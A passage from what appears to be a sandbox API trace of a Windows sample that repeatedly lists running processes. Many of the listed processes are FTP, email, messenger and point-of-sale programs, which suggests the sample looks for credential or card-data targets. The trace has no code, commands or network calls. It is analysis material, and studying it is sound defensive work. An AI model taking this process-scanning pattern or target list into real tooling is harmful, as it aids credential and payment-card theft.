th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0285.927] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0285.929] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0285.930] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0285.931] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0285.933] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0285.945] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0285.947] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0285.948] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0285.953] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0285.955] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0285.956] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0285.957] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0285.959] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0285.960] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0285.962] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0285.963] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0285.964] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0285.966] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0285.970] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0285.972] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0285.973] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0285.975] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0285.976] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0285.978] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0285.979] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0285.981] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0285.986] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0285.988] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0285.989] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0285.991] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0285.993] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0285.994] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0286.047] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0286.050] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0286.052] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0286.055] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0286.057] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0286.063] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0286.065] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0286.067] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0286.069] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0286.071] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0286.072] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0286.077] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0286.079] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0286.080] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0286.082] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0286.084] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0286.085] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0286.087] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0286.089] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0286.129] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0286.132] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0286.134] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0286.135] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0286.146] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0286.148] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0286.150] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0286.152] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0286.155] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0286.157] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0286.158] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0286.160] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0286.162] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0286.164] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0286.166] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0286.167] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0286.169] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0286.171] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0286.173] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0286.174] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0286.176] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0286.177] CloseHandle (hObject=0x2134) returned 1 [0286.177] Sleep (dwMilliseconds=0x64) [0286.348] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0286.358] Process32First (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.360] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0286.362] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0286.364] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0286.365] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0286.366] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0286.368] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0286.369] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0286.371] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0286.373] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.374] Process32Next (in: 